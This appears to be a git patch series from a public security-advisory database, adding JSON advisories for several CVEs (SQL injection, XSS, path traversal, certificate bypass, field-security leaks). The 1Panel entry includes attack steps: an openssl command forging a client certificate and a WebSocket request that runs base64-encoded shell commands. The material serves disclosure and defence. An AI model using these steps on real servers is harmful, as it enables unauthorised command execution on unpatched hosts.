], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/informe_campo_entrevistas.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41372" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json b/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json new file mode 100644 index 0000000000000..2573bf73e7f53 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6qp-r53v-fvh5", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2025-46018" + ], + "details": "CSC Pay Mobile App 2.19.4 (fixed in version 2.20.0) contains a vulnerability allowing users to bypass payment authorization by disabling Bluetooth at a specific point during a transaction. This could result in unauthorized use of laundry services and potential financial loss.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46018" + }, + { + "type": "WEB", + "url": "https://github.com/niranjangaire1995/CVE-2025-46018-CSC-Pay-Mobile-App-Payment-Authentication-Bypass" + }, + { + "type": "WEB", + "url": "https://www.cscsw.com/disclosure-process" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T14:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xcwr-x5fm-7jmr/GHSA-xcwr-x5fm-7jmr.json b/advisories/unreviewed/2025/08/GHSA-xcwr-x5fm-7jmr/GHSA-xcwr-x5fm-7jmr.json new file mode 100644 index 0000000000000..7ded2b83b1bbf --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xcwr-x5fm-7jmr/GHSA-xcwr-x5fm-7jmr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcwr-x5fm-7jmr", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2023-44976" + ], + "details": "Hangzhou Shunwang Rentdrv2 before 2024-12-24 allows local users to terminate EDR processes and possibly have unspecified other impact via DeviceIoControl with control code 0x22E010, as exploited in the wild in October 2023.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44976" + }, + { + "type": "WEB", + "url": "https://github.com/keowu/BadRentdrv2" + }, + { + "type": "WEB", + "url": "https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-782" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T14:15:34Z" + } +} \ No newline at end of file From 456e619cca4ab7f36e010adb3553c4ed3b77f152 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 16:01:28 +0000 Subject: [PATCH 294/323] Publish GHSA-wx6g-fm6f-w822 --- .../2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json index 19e52cca5edf2..44403b34e31c5 100644 --- a/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json +++ b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-wx6g-fm6f-w822", - "modified": "2025-07-31T19:37:48Z", + "modified": "2025-08-01T15:59:21Z", "published": "2025-07-31T19:37:48Z", "aliases": [ "CVE-2025-53009" ], "summary": "MaterialX Stack Overflow via Lack of MTLX XML Parsing Recursion Limit ", - "details": "### Summary\n\nWhen parsing an MTLX file with multiple nested `nodegraph` implementations, the MaterialX XML parsing logic can potentially crash due to stack exhaustion.\n\n### Details\n\nBy specification, multiple kinds of elements in MTLX support nesting other elements, such as in the case of `nodegraph` elements. Parsing these subtrees is implemented via recursion, and since there is no max depth imposed on the XML document, this can lead to a stack overflow when the library parses an MTLX file with an excessively high number of nested elements.\n\n### PoC\n\nPlease download the `recursion_overflow.mtlx` file from the following link: \n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-53009\n\n`build/bin/MaterialXView --material recursion_overflow.mtlx`\n\n\n### Impact\nAn attacker could intentionally crash a target program that uses OpenEXR by sending a malicious MTLX file.", + "details": "### Summary\n\nWhen parsing an MTLX file with multiple nested `nodegraph` implementations, the MaterialX XML parsing logic can potentially crash due to stack exhaustion.\n\n### Details\n\nBy specification, multiple kinds of elements in MTLX support nesting other elements, such as in the case of `nodegraph` elements. Parsing these subtrees is implemented via recursion, and since there is no max depth imposed on the XML document, this can lead to a stack overflow when the library parses an MTLX file with an excessively high number of nested elements.\n\n### PoC\n\nPlease download the `recursion_overflow.mtlx` file from the following link: \n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-53009\n\n`build/bin/MaterialXView --material recursion_overflow.mtlx`\n\n\n### Impact\nAn attacker could intentionally crash a target program that uses MaterialX by sending a malicious MTLX file.", "severity": [ { "type": "CVSS_V4", From 44549464402156b7c973a76b61d09f6af0471f42 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:10:25 +0000 Subject: [PATCH 295/323] Publish GHSA-q6gg-9f92-r9wg --- .../GHSA-q6gg-9f92-r9wg.json | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 advisories/github-reviewed/2025/08/GHSA-q6gg-9f92-r9wg/GHSA-q6gg-9f92-r9wg.json diff --git a/advisories/github-reviewed/2025/08/GHSA-q6gg-9f92-r9wg/GHSA-q6gg-9f92-r9wg.json b/advisories/github-reviewed/2025/08/GHSA-q6gg-9f92-r9wg/GHSA-q6gg-9f92-r9wg.json new file mode 100644 index 0000000000000..6fb7ddf8ef3e4 --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-q6gg-9f92-r9wg/GHSA-q6gg-9f92-r9wg.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6gg-9f92-r9wg", + "modified": "2025-08-01T18:08:15Z", + "published": "2025-08-01T18:08:15Z", + "aliases": [ + "CVE-2025-54386" + ], + "summary": "Traefik Client Plugin's Path Traversal Vulnerability Allows Arbitrary File Overwrite and Remote Code Execution", + "details": "### Summary\nA path traversal vulnerability was discovered in WASM Traefik’s plugin installation mechanism. By supplying a maliciously crafted ZIP archive containing file paths with `../` sequences, an attacker can overwrite arbitrary files on the system outside of the intended plugin directory. This can lead to remote code execution (RCE), privilege escalation, persistence, or denial of service.\n **✅ After investigation, it is confirmed that no plugins on the [Catalog](https://plugins.traefik.io/plugins) were affected. There is no known impact.**\n\n### Details\nThe vulnerability resides in the WASM plugin extraction logic, specifically in the `unzipFile` function (`/plugins/client.go`). The application constructs file paths during ZIP extraction using `filepath.Join(destDir, f.Name)` without validating or sanitizing `f.Name`. If the ZIP archive contains entries with `../`, the resulting path can escape the intended directory, allowing writes to arbitrary locations on the host filesystem.\n\n### Attack Requirements\nThere are several requirements needed to make this attack possible:\n- The Traefik server should be deployed with [plugins enabled](https://doc.traefik.io/traefik/plugins/) with a WASM plugin (yaegi plugins are not impacted).\n- The attacker should have write access to a remote plugin asset loaded by the Traefik server\n- The attacker should craft a malicious version of this plugin\n\n### Warning\nAs clearly stated in the [documentation](https://doc.traefik.io/traefik/plugins/), plugins are experimental in Traefik, and unsafe plugins could damage your infrastructure:\n\n> **Experimental Features**\nPlugins can change the behavior of Traefik in unforeseen ways. Exercise caution when adding new plugins to production Traefik instances.\n\n### Impact\n**This vulnerability did not affect any plugin from the catalog. There is no known impact. \nAdditionally, the catalog will also prevent any compromised plugin to be available across all Traefik versions.**\nThis vulnerability could allow an attacker to perform arbitrary file write outside the intended plugin extraction directory by crafting a malicious ZIP archive that includes `../` (directory traversal) in file paths.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.11.27" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.4.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.4" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.5.0-rc1" + }, + { + "fixed": "3.5.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.5.0-rc2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/security/advisories/GHSA-q6gg-9f92-r9wg" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/plugin-service/pull/71" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/plugin-service/pull/72" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/pull/11911" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/commit/5ef853a0c53068f69a6c229a5815a0dc6e0a8800" + }, + { + "type": "PACKAGE", + "url": "https://github.com/traefik/traefik" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/releases/tag/v2.11.28" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-30" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:08:15Z", + "nvd_published_at": null + } +} \ No newline at end of file From 13aac994e5854e0939919f877a6a95264fcdd875 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:13:37 +0000 Subject: [PATCH 296/323] Publish Advisories GHSA-782f-gxj5-xvqc GHSA-8j63-96wh-wh3j --- .../GHSA-782f-gxj5-xvqc.json | 39 ++++++++-- .../GHSA-8j63-96wh-wh3j.json | 76 +++++++++++++++++++ 2 files changed, 108 insertions(+), 7 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json (55%) create mode 100644 advisories/github-reviewed/2025/08/GHSA-8j63-96wh-wh3j/GHSA-8j63-96wh-wh3j.json diff --git a/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json b/advisories/github-reviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json similarity index 55% rename from advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json rename to advisories/github-reviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json index ae165c328083f..7ba17e41faf1d 100644 --- a/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json +++ b/advisories/github-reviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json @@ -1,24 +1,49 @@ { "schema_version": "1.4.0", "id": "GHSA-782f-gxj5-xvqc", - "modified": "2025-07-31T21:31:53Z", + "modified": "2025-08-01T18:12:32Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-51503" ], + "summary": "Microweber Has Stored XSS Vulnerability in User Profile Fields", "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Microweber CMS 2.0 allows attackers to inject malicious scripts into user profile fields, leading to arbitrary JavaScript execution in admin browsers.", "severity": [ { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "microweber/microweber" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "last_affected": "2.0.19" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51503" }, + { + "type": "PACKAGE", + "url": "https://github.com/microweber/microweber" + }, { "type": "WEB", "url": "https://github.com/progprnv/CVE-Reports" @@ -36,9 +61,9 @@ "cwe_ids": [ "CWE-79" ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:12:31Z", "nvd_published_at": "2025-07-31T18:15:42Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/08/GHSA-8j63-96wh-wh3j/GHSA-8j63-96wh-wh3j.json b/advisories/github-reviewed/2025/08/GHSA-8j63-96wh-wh3j/GHSA-8j63-96wh-wh3j.json new file mode 100644 index 0000000000000..74ea77ce670e4 --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-8j63-96wh-wh3j/GHSA-8j63-96wh-wh3j.json @@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j63-96wh-wh3j", + "modified": "2025-08-01T18:10:21Z", + "published": "2025-08-01T18:10:21Z", + "aliases": [ + "CVE-2025-54424" + ], + "summary": "1Panel agent certificate verification bypass leading to arbitrary command execution", + "details": "### Project Address: Project Address [1Panel](https://github.com/1Panel-dev/1Panel)\n### Official website: https://www.1panel.cn/\n### Time: 2025 07 26\n### Version: 1panel V2.0.5\n### Vulnerability Summary\n - First, we introduce the concepts of 1panel v2 Core and Agent. After the new version is released, 1panel adds the node management function, which allows you to control other hosts by adding nodes.\n - The HTTPS protocol used for communication between the Core and Agent sides did not fully verify the authenticity of the certificate during certificate verification, resulting in unauthorized interfaces. The presence of a large number of command execution or high-privilege interfaces in the 1panel led to RCE.\n\n![](https://github.com/user-attachments/assets/ebd0b388-d6c0-4678-98ee-47646e69ebe9)\n\n### Code audit process\n\n1. First we go to the Agent HTTP routing fileagent/init/router/router.go\n\n![](https://github.com/user-attachments/assets/dd9152a9-6677-4674-b75f-3b67dcedb321)\n\n2. It was found that the Routersreference function in the function Certificatewas globally checked.agent/middleware/certificate.go\n\n![](https://github.com/user-attachments/assets/5585f251-61e0-4603-8e9e-f50465f265ae)\n\n3. The discovery Certificatefunction determines c.Request.TLS.HandshakeCompletewhether certificate communication has been performed\n\n![](https://github.com/user-attachments/assets/5a50bdec-cc4d-4439-9b7b-98991ca4ff9c)\n\n4. Since c.Request.TLS.HandshakeCompletethe true or false judgment is determined by agent/server/server.gothe code Startfunctiontls.RequireAnyClientCert\n\n![](https://github.com/user-attachments/assets/3785b245-6e1f-44ff-9760-708b3e76560b)\n\nNote::`Here due to the use of tls.RequireAnyClientCert instead of tls.RequireAndVerifyClientCert,RequireAnyClientCert Only require the client to provide a certificate,Does not verify the issuance of certificates CA,So any self assigned certificate will pass TLS handshake。`\n\n5. The subsequent Certificatefunction only verified that the CN field of the certificate was panel_client, without verifying the certificate issuer. Finally, it was discovered that the WebSocket connection could bypass Proxy-ID verification.\n\n![](https://github.com/user-attachments/assets/f521d75a-cd72-41b8-b90f-f10ffb923484)\n\n6. Process WebSocket interface (based on the above questions, all processes and other sensitive information can be obtained)\nrouting address: /process/ws\nthe request format is as follows\n```\n{\n \"type\": \"ps\", // 数据类型: ps(进程), ssh(SSH会话), net(网络连接), wget(下载进度)\n \"pid\": 123, // 可选,指定进程ID进行筛选\n \"name\": \"process_name\", // 可选,根据进程名筛选\n \"username\": \"user\" // 可选,根据用户名筛选\n}\n```\n![](https://github.com/user-attachments/assets/011dc303-9316-4160-ad98-165c032f6e49)\n\n - Terminal SSH WebSocket interface (according to the above problem, any command can be executed)\nrouting address: /hosts/terminal\nthe request format is as follows\n```\n{\n \"type\": \"cmd\",\n \"data\": \"d2hvYW1pCg==\" // \"whoami\" 的base64编码,记住不要忘记回车。\n}\n```\n![](https://github.com/user-attachments/assets/6f2ac997-8b32-4cb6-a64c-be33db845a76)\n\n - Container Terminal WebSocket interface (container execution command interface)\nrouting address:/containers/terminal\n \n - File Download Process WebSocket interface (automatically push download progress information)\nrouting address:/files/wget/process\n\n### Attack process\n\n1. First generate a fake certificate\nopenssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj \"/CN=panel_client\"\n\n2. Then use the certificate to request verification. If the websocket interface is successfully connected, there is a vulnerability.\n\n![](https://github.com/user-attachments/assets/9e3016f8-ebe0-4dc9-b797-405c6a4aec89)\n\n![](https://github.com/user-attachments/assets/8076ad9c-da30-452f-9f42-83ae1d66f9ac)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/1Panel-dev/1Panel/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "2.0.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/1Panel-dev/1Panel/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20250730021757-04b9cbd87a15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-8j63-96wh-wh3j" + }, + { + "type": "PACKAGE", + "url": "https://github.com/1Panel-dev/1Panel" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:10:21Z", + "nvd_published_at": null + } +} \ No newline at end of file From d905c528855ad2a443f5a1f13a2209f1c074be25 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:16:58 +0000 Subject: [PATCH 297/323] Publish Advisories GHSA-2rjv-cv85-xhgm GHSA-rrmm-wq7q-h4v5 --- .../GHSA-2rjv-cv85-xhgm.json | 55 +++++++++++++++++++ .../GHSA-rrmm-wq7q-h4v5.json | 55 +++++++++++++++++++ 2 files changed, 110 insertions(+) create mode 100644 advisories/github-reviewed/2025/08/GHSA-2rjv-cv85-xhgm/GHSA-2rjv-cv85-xhgm.json create mode 100644 advisories/github-reviewed/2025/08/GHSA-rrmm-wq7q-h4v5/GHSA-rrmm-wq7q-h4v5.json diff --git a/advisories/github-reviewed/2025/08/GHSA-2rjv-cv85-xhgm/GHSA-2rjv-cv85-xhgm.json b/advisories/github-reviewed/2025/08/GHSA-2rjv-cv85-xhgm/GHSA-2rjv-cv85-xhgm.json new file mode 100644 index 0000000000000..cdcdfadc793cf --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-2rjv-cv85-xhgm/GHSA-2rjv-cv85-xhgm.json @@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rjv-cv85-xhgm", + "modified": "2025-08-01T18:15:03Z", + "published": "2025-08-01T18:15:03Z", + "aliases": [], + "summary": "OpenSearch unauthorized data access on fields protected by field level security if field is a member of an object", + "details": "### Impact\n\nOpenSearch versions 2.19.2 and earlier improperly apply Field Level Security (FLS) rules on fields which are not at the top level of the source document tree (i.e., which are members of a JSON object). \n\nIf an FLS exclusion rule (like `~object`) is applied to an object valued attribute in a source document, the object is properly removed from the `_source` document in search and get results. However, any member attribute of that object remains available to search queries. This allows to reconstruct the original field contents using range queries. \n\n### Patches\n\nThe issue has been resolved in OpenSearch 3.0.0 and OpenSearch 2.19.3.\n\n### Workarounds\n\nIf FLS exclusion rules are used for object valued attributes (like `~object`), add an additional exclusion rule for the members of the object (like `~object.*`).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.opensearch.plugin:opensearch-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.19.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/opensearch-project/security/security/advisories/GHSA-2rjv-cv85-xhgm" + }, + { + "type": "PACKAGE", + "url": "https://github.com/opensearch-project/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:15:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/08/GHSA-rrmm-wq7q-h4v5/GHSA-rrmm-wq7q-h4v5.json b/advisories/github-reviewed/2025/08/GHSA-rrmm-wq7q-h4v5/GHSA-rrmm-wq7q-h4v5.json new file mode 100644 index 0000000000000..8ee47bb1ff9dd --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-rrmm-wq7q-h4v5/GHSA-rrmm-wq7q-h4v5.json @@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrmm-wq7q-h4v5", + "modified": "2025-08-01T18:15:01Z", + "published": "2025-08-01T18:15:00Z", + "aliases": [], + "summary": "OpenSearch unauthorized data access on fields protected by field masking for fields of type ip, geo_point, geo_shape, xy_point, xy_shape", + "details": "### Impact\n\nOpenSearch versions 2.19.2 and earlier improperly apply field masking rules on fields of the types `ip`, `geo_point`, `geo_shape`, `xy_point`, `xy_shape`. While the content of these fields is properly redacted in the `_source` document returned by search operations, the original unredacted values remain available to search queries. This allows to reconstruct the original field contents using range queries.\n\nAdditionally, the content of fields of type `geo_point`, `geo_shape`, `xy_point`, `xy_shape` is returned in an unredacted form if requested via the `fields` option of the search API.\n\n### Patches\n\nThe issue has been resolved in OpenSearch 3.0.0 and OpenSearch 2.19.3.\n\n### Workarounds\n\nIf you cannot upgrade immediately, you can avoid the problem by using field level security (FLS) protection on fields of the affected types instead of field masking.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.opensearch.plugin:opensearch-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.19.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/opensearch-project/security/security/advisories/GHSA-rrmm-wq7q-h4v5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/opensearch-project/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:15:00Z", + "nvd_published_at": null + } +} \ No newline at end of file From f97e37c64344ae06a1579eb607d903782df09370 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:32:50 +0000 Subject: [PATCH 298/323] Advisory Database Sync --- .../GHSA-g8j6-3mwg-7x4g.json | 18 ++++++- .../GHSA-4fj4-9m67-3mj3.json | 6 ++- .../GHSA-pr9m-r5mr-v22j.json | 2 +- .../GHSA-g2ph-wvc2-ph4v.json | 9 +++- .../GHSA-fjrg-q598-j558.json | 3 +- .../GHSA-jff4-5h8q-wpxm.json | 3 +- .../GHSA-xv2q-4cq2-h5pc.json | 11 +++-- .../GHSA-2x2j-3c2v-g3c2.json | 44 +++++++++++++++++ .../GHSA-64m7-3j89-3cj8.json | 36 ++++++++++++++ .../GHSA-6c5r-4wfc-3mcx.json | 36 ++++++++++++++ .../GHSA-6h4p-m86h-hhgh.json | 36 ++++++++++++++ .../GHSA-7w87-cwwm-qff7.json | 44 +++++++++++++++++ .../GHSA-8258-pcw6-7gfq.json | 36 ++++++++++++++ .../GHSA-8357-fjvx-xrm8.json | 44 +++++++++++++++++ .../GHSA-8x5q-fmc6-r74x.json | 36 ++++++++++++++ .../GHSA-9847-xprf-x456.json | 36 ++++++++++++++ .../GHSA-99rf-9fx6-652g.json | 36 ++++++++++++++ .../GHSA-cg36-rxhq-p3j7.json | 36 ++++++++++++++ .../GHSA-cvrx-jhp7-38jf.json | 29 +++++++++++ .../GHSA-fjwp-5xr6-hvh5.json | 36 ++++++++++++++ .../GHSA-fmhj-j6r9-5m2p.json | 33 +++++++++++++ .../GHSA-fmp3-xxcc-559c.json | 48 +++++++++++++++++++ .../GHSA-h64g-vgvx-2m8r.json | 33 +++++++++++++ .../GHSA-j7gx-cwm7-5mxg.json | 33 +++++++++++++ .../GHSA-m523-xm42-q7ff.json | 15 ++++-- .../GHSA-mr4h-qf9j-f665.json | 36 ++++++++++++++ .../GHSA-mvj3-hc7j-vp74.json | 44 +++++++++++++++++ .../GHSA-mwgr-84fv-3jh9.json | 36 ++++++++++++++ .../GHSA-mxg3-45rj-wpf7.json | 40 ++++++++++++++++ .../GHSA-p3q2-74hc-43v3.json | 36 ++++++++++++++ .../GHSA-q2v9-7453-3jwf.json | 33 +++++++++++++ .../GHSA-q8q3-6g93-33hh.json | 36 ++++++++++++++ .../GHSA-qgj7-fmq2-6cc4.json | 36 ++++++++++++++ .../GHSA-qgm9-fp3r-vm5v.json | 40 ++++++++++++++++ .../GHSA-qh7w-62mf-364r.json | 40 ++++++++++++++++ .../GHSA-qv3p-fmv3-9hww.json | 36 ++++++++++++++ .../GHSA-rpv2-rq4j-p9m3.json | 37 ++++++++++++++ .../GHSA-v6qp-r53v-fvh5.json | 15 ++++-- .../GHSA-v6r4-35f9-9rpw.json | 36 ++++++++++++++ .../GHSA-xfj7-2jg6-3957.json | 40 ++++++++++++++++ .../GHSA-xfxw-gr8g-6h57.json | 36 ++++++++++++++ 41 files changed, 1258 insertions(+), 18 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json create mode 100644 advisories/unreviewed/2025/08/GHSA-64m7-3j89-3cj8/GHSA-64m7-3j89-3cj8.json create mode 100644 advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json create mode 100644 advisories/unreviewed/2025/08/GHSA-7w87-cwwm-qff7/GHSA-7w87-cwwm-qff7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8258-pcw6-7gfq/GHSA-8258-pcw6-7gfq.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8x5q-fmc6-r74x/GHSA-8x5q-fmc6-r74x.json create mode 100644 advisories/unreviewed/2025/08/GHSA-9847-xprf-x456/GHSA-9847-xprf-x456.json create mode 100644 advisories/unreviewed/2025/08/GHSA-99rf-9fx6-652g/GHSA-99rf-9fx6-652g.json create mode 100644 advisories/unreviewed/2025/08/GHSA-cg36-rxhq-p3j7/GHSA-cg36-rxhq-p3j7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json create mode 100644 advisories/unreviewed/2025/08/GHSA-fjwp-5xr6-hvh5/GHSA-fjwp-5xr6-hvh5.json create mode 100644 advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json create mode 100644 